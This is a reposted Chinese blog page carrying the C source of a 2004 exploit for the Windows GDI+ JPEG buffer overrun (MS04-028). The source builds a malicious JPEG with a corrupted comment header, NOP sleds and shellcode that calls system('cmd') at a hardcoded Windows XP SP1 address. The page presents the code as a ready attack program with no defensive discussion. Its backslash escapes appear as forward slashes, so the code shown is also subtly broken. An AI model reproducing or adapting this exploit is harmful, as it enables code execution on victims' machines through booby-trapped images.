综合

img www_307

Microsoft Windows GDI+ JPG_Exp

发表于2004/9/27 20:35:00  1254人阅读

WinJPEGAdminExp_MS04-028.sh 攻击程序   Windows   7.62 K   2004-09-23   dav1d 
WinJPEG(GDI+)Exp_MS04-028.c 攻击程序   Windows   7.40 K   2004-09-23   dav1d 
WinJPEGbufferExp_MS04-028.sh 攻击程序   Windows   4.36 K   2004-09-23   dav1d 



// GDI+ buffer overrun exploit by FoToZ
// NB: the headers here are only sample headers taken from a .JPG file,
// with the FF FE 00 01 inserted in header1.
// Sample shellcode is provided
// You can put approx. 2500 bytes of shellcode...who needs that much anyway
// Tested on an unpatched WinXP SP1

#include <direct.h>
#include <stdio.h>

char shellcode[]=
"/x68" // push
"cmd "
"/x8B/xC4" // mov eax,esp
"/x50" // push eax
"/xB8/x44/x80/xC2/x77" // mov eax,77c28044h (address of system() on WinXP SP1)
"/xFF/xD0" // call eax
;

char header1[]=
"/xFF/xD8/xFF/xE0/x00/x10/x4A/x46/x49/x46/x00/x01/x02/x00/x00/x64"
"/x00/x64/x00/x00/xFF/xEC/x00/x11/x44/x75/x63/x6B/x79/x00/x01/x00"
"/x04/x00/x00/x00/x0A/x00/x00/xFF/xEE/x00/x0E/x41/x64/x6F/x62/x65"
"/x00/x64/xC0/x00/x00/x00/x01/xFF/xFE/x00/x01/x00/x14/x10/x10/x19"
"/x12/x19/x27/x17/x17/x27/x32/xEB/x0F/x26/x32/xDC/xB1/xE7/x70/x26"
"/x2E/x3E/x35/x35/x35/x35/x35/x3E";

char setNOPs1[]=
"/xE8/x00/x00/x00/x00/x5B/x8D/x8B"
"/x00/x05/x00/x00/x83/xC3/x12/xC6/x03/x90/x43/x3B/xD9/x75/xF8";

char setNOPs2[]=
"/x3E/xE8/x00/x00/x00/x00/x5B/x8D/x8B"
"/x2F/x00/x00/x00/x83/xC3/x12/xC6/x03/x90/x43/x3B/xD9/x75/xF8";

char header2[]=
"/x44"
"/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x01/x15/x19/x19"
"/x20/x1C/x20/x26/x18/x18/x26/x36/x26/x20/x26/x36/x44/x36/x2B/x2B"
"/x36/x44/x44/x44/x42/x35/x42/x44/x44/x44/x44/x44/x44/x44/x44/x44"
"/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44"
"/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/x44/xFF/xC0/x00"
"/x11/x08/x03/x59/x02/x2B/x03/x01/x22/x00/x02/x11/x01/x03/x11/x01"
"/xFF/xC4/x00/xA2/x00/x00/x02/x03/x01/x01/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x03/x04/x01/x02/x05/x00/x06/x01/x01/x01/x01"
"/x01/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x01/x00/x02"
"/x03/x10/x00/x02/x01/x02/x04/x05/x02/x03/x06/x04/x05/x02/x06/x01"
"/x05/x01/x01/x02/x03/x00/x11/x21/x31/x12/x04/x41/x51/x22/x13/x05"
"/x61/x32/x71/x81/x42/x91/xA1/xC1/x52/x23/x14/xB1/xD1/x62/x15/xF0"
"/xE1/x72/x33/x06/x82/x24/xF1/x92/x43/x53/x34/x16/xA2/xD2/x63/x83"
"/x44/x54/x25/x11/x00/x02/x01/x03/x02/x04/x03/x08/x03/x00/x02/x03"
"/x01/x00/x00/x00/x00/x01/x11/x21/x31/x02/x41/x12/xF0/x51/x61/x71"
"/x81/x91/xA1/xB1/xD1/xE1/xF1/x22/x32/x42/x52/xC1/x62/x13/x72/x92"
"/xD2/x03/x23/x82/xFF/xDA/x00/x0C/x03/x01/x00/x02/x11/x03/x11/x00"
"/x3F/x00/x0F/x90/xFF/x00/xBC/xDA/xB3/x36/x12/xC3/xD4/xAD/xC6/xDC"
"/x45/x2F/xB2/x97/xB8/x9D/xCB/x63/xFD/x26/xD4/xC6/xD7/x70/xA4/x19"
"/x24/x50/xCA/x46/x2B/xFC/xEB/x3B/xC7/xC9/xA5/x4A/x8F/x69/x26/xDF"
"/x6D/x72/x4A/x9E/x27/x6B/x3E/xE6/x92/x86/x24/x85/x04/xDB/xED/xA9"
"/x64/x8E/x6B/x63/x67/x19/x1A/xA5/xE7/xB8/x28/x3D/x09/xAB/x5D/x5F"
"/x16/xF7/x8C/xED/x49/x4C/xF5/x01/xE6/xE5/xD5/x1C/x49/xAB/x10/x71"
"/xA6/x36/x9B/x93/x24/x61/x00/x0F/x61/xEC/x34/xA7/x9C/x23/xF4/x96"
"/xC6/xE6/xAF/xB7/x80/x76/xEF/x93/xF0/xAA/x28/x8A/x6B/xE0/x18/xC0"
"/xA4/x9B/x7E/x90/x39/x03/xC2/x90/xDC/x43/x31/x91/x62/x91/x86/x23"
"/x35/x35/xA2/x80/x4D/xFA/x72/x31/x07/x9D/x03/x70/xA8/x93/x24/x4F"
"/x89/x51/x83/x5E/xA4/x2E/x7A/xC0/x7D/xA9/x8A/x10/x61/x64/x07/xFA"
"/x88/xC6/x89/x26/xDA/x0F/x20/xBD/xB9/x16/xD2/xA8/xE8/x91/x3F/x1A"
"/xE2/xBA/xF0/xBE/x74/xAB/x1D/xC4/x44/x15/x1A/x8A/x9C/xC7/x2A/x6B"
"/xA3/x33/xB7/x1E/x88/x47/x69/xA9/x64/x68/x26/xC1/x97/x0B/xD6/x86"
"/x8B/x1B/x29/xC6/x87/xE4/xC7/xFD/xCC/x53/x11/xA5/x9C/x62/x6A/xE5"
"/x40/x37/x61/x89/xF6/xB2/x9C/x2A/x7C/xFD/x05/x6A/x30/x5F/x52/x02"
"/xEB/x72/xBF/x7D/x74/x4C/x23/xB9/x8F/xD8/x78/x67/x54/x59/x64/x47"
"/xC5/x75/x21/x18/xD5/xE3/x58/xE1/x72/x63/xBF/x6D/xBD/xCB/xCA/x82"
"/x65/xE7/xDB/x09/x54/x4F/x0D/x95/x86/x76/xE3/xF2/xA0/x48/x82/x55"
"/xD7/xA6/xCE/xA7/xAA/xDC/x6A/xF1/xA9/x8E/xE0/x35/xC1/xCA/xA1/xD4"
"/x93/xD2/xD6/x39/x95/x3C/x6B/x46/x60/xAC/xC1/x3B/x60/xC9/x70/x84"
"/x8E/xA1/x9A/x9A/x20/x01/x94/xCA/x08/x91/x53/xDC/x01/xB1/xB5/x12"
"/x37/x11/xC6/xC1/xAC/xF1/x11/xD4/x9C/x6B/x3E/x69/x76/xF0/x1D/x7B"
"/x52/x6D/xC9/xA8/x66/x94/xBB/x79/x8F/x7E/xDE/x17/xFD/x4D/xAB/x1E"
"/x76/x7A/xA3/x2B/xE2/x50/x06/xB7/x2C/xEB/x2A/x49/xC9/xEA/x4E/x9B"
"/xE7/xCA/xAF/x1E/xEC/x23/xDC/x8B/xE1/x6B/x5F/x1A/x9B/xE8/x49/x2E"
"/x63/xE5/x03/x32/xCD/x19/xB8/x23/x10/x78/x1F/x85/x5C/x15/x8C/x97"
"/x84/x9B/xDB/x15/x35/x9F/x16/xE0/x1E/x86/xB9/x8F/x97/x11/x4E/xDA"
"/x35/x02/x45/x25/x93/xF8/x55/x24/x17/xB9/x1B/xF5/xC8/x07/xA9/xE2"
"/x2A/x76/xB0/xC2/x37/x01/x95/xAD/x81/xB6/x1C/x6A/xA2/x38/xD9/xAE"
"/xCA/x59/x18/x75/x25/xFF/x00/x81/xAE/xD8/xE8/xBB/x47/x62/xAC/xB7"
"/xB6/xA1/x8D/x40/xE3/x86/x65/x6D/x1E/xDB/x89/x2F/x9D/xCD/x6B/x24"
"/x62/x41/x61/x89/xAC/x2D/x8B/x3E/xB6/x68/xC0/x63/x73/x70/x6B/x6B"
"/x6A/xA1/x7A/xAC/x56/xE7/x11/x56/x58/xD4/x13/xA4/x0B/xB6/xEB/xB3"
"/x3B/x47/x22/x95/xD3/x53/x2E/xEA/x19/x86/x96/xF7/x03/x83/x52/x9E"
"/x54/xAB/x6E/x58/x63/x7C/x33/xCE/x93/xB1/x19/x1C/xE9/xDB/xAA/x35"
"/xBF/x46/x8D/xD4/xD2/x56/xE0/xE0/x33/xA1/x4D/x0A/x4E/x3B/xB1/xCD"
"/xD4/x06/x44/x56/x4A/xCD/x24/x26/xEA/x6D/x7A/x87/xDC/x3B/x60/x6D"
"/xFC/x2A/x86/x1B/x97/x36/x6D/x42/x04/xA0/x11/xEE/xE7/x46/x22/x35"
"/xD5/x26/xB0/x1C/x0B/x7C/x69/x5F/x06/xEC/x5A/xC5/x0B/x46/x70/x27"
"/xF2/xD4/x79/xAD/x89/xDA/x30/x74/xBD/x98/xE4/x68/x58/x86/xE4/x1B"
"/x69/xB9/xDC/x2B/x30/x87/x48/x53/xC5/x85/x3B/xDD/x8A/x4E/xB5/x42"
"/xB2/x8C/x6E/x2C/x01/xF8/x56/x04/x7B/xC9/xA3/x05/x4F/xB4/xD5/xA2"
"/xDF/xF6/xFD/xC6/xE2/xA7/x3C/x89/x24/xFE/xA9/x5E/xC3/xD4/x6D/xF7"
"/x85/xC9/x59/x39/x63/x59/x9B/xFF/x00/x06/x1A/x5E/xFA/x69/x0A/x46"
"/x2B/xC0/x9F/xC2/x91/x8B/xC9/x40/x58/x16/xBD/xF2/xC0/xD3/x3B/x7F"
"/x2D/xA9/xBB/x2E/x49/x42/x6D/x52/x70/x39/x62/x9F/x08/x73/x6F/x20"
"/x09/x64/x00/x01/x83/x2B/x00/xD5/x97/xBC/xDC/xF6/x9C/xA7/x66/xEA"
"/xD9/xB6/x9F/xE1/x56/xDE/xBA/xEC/x65/xB4/x44/xD8/xE3/x8D/x52/x2F"
"/x36/xCE/x74/x33/x7E/x9F/x2E/x22/x99/x8B/xC9/x6D/x5A/x6D/x9E/xA8"
"/x22/xC7/x0C/xA8/x62/x3D/x17/x1D/x2F/xC8/xFA/xD4/xB0/x9E/x14/x45"
"/x45/xD5/x6E/x96/x04/xE1/xF1/xA0/x37/x90/x5B/xD8/x7F/x81/x57/x1B"
"/xC8/xD5/x48/x27/x0E/x3C/x6B/x3D/xCD/x44/x15/x92/x41/x25/x94/x82"
"/xAE/x0E/x42/x97/x8D/x8C/x6D/xAE/x56/xB8/x26/xD8/x0F/xE3/x43/x93"
"/x73/x18/x75/x28/xD7/xF8/xD5/xFF/x00/x74/xE4/x18/xC2/x82/xAC/x6F"
"/x86/x7F/x2A/x4C/xBE/xE5/xFC/xD2/x22/xCC/x9A/x32/xD1/x7C/x7D/x68"
;

void main()
{
        FILE *fin,*fout;
        unsigned int i=0,j=0;
        unsigned char c;
  mkdir("FoToZ_JPEG");
  fout=fopen("FoToZ_JPEG//FoToZ.jpg","wb");
        
        if( !fout ) {
                printf("ERROR OPENING FILES/n");
                return;
        }
        printf("shellcode size is %u bytes/n", sizeof(shellcode)-1);
        for(i=0;i<sizeof(shellcode)-1;i++)
                if( 0xD9FF == *(unsigned short *)&shellcode[i] ) {
                        printf("WARNING: SHELLCODE CONTAINS FFh D9h/n"
                                   "FIX UR SHELLCODE/n");
                        return;
                }
        j=sizeof(header1)+sizeof(setNOPs1)+sizeof(header2)-3;
        for(i=0;i<sizeof(header1)-1;i++)
   fputc(header1[i],fout);
        for(i=0;i<sizeof(setNOPs1)-1;i++)
   fputc(setNOPs1[i],fout);
        for(i=0;i<sizeof(header2)-1;i++)
   fputc(header2[i],fout);
        for(i=j;i<0x63c;i++) fputc(0x90,fout); // stuff in a couple of NOPs
        j=i;
        for(i=0;i<sizeof(shellcode)-1;i++)
   fputc(shellcode[i],fout);
        for(i=i+j;i<0x1000-sizeof(setNOPs2)+1;i++)
   fputc(0x90,fout); // stuff NOPs
        // (stuffing NOPs is becoming a bad habit)
        for(j=0;i<0x1000 && j<sizeof(setNOPs2)-1;i++,j++)
   fputc(setNOPs2[j],fout);
        
        fprintf(fout,"/xFF/xD9");
        fcloseall();
}
阅读全文
0 0

相关文章推荐

img
取 消
img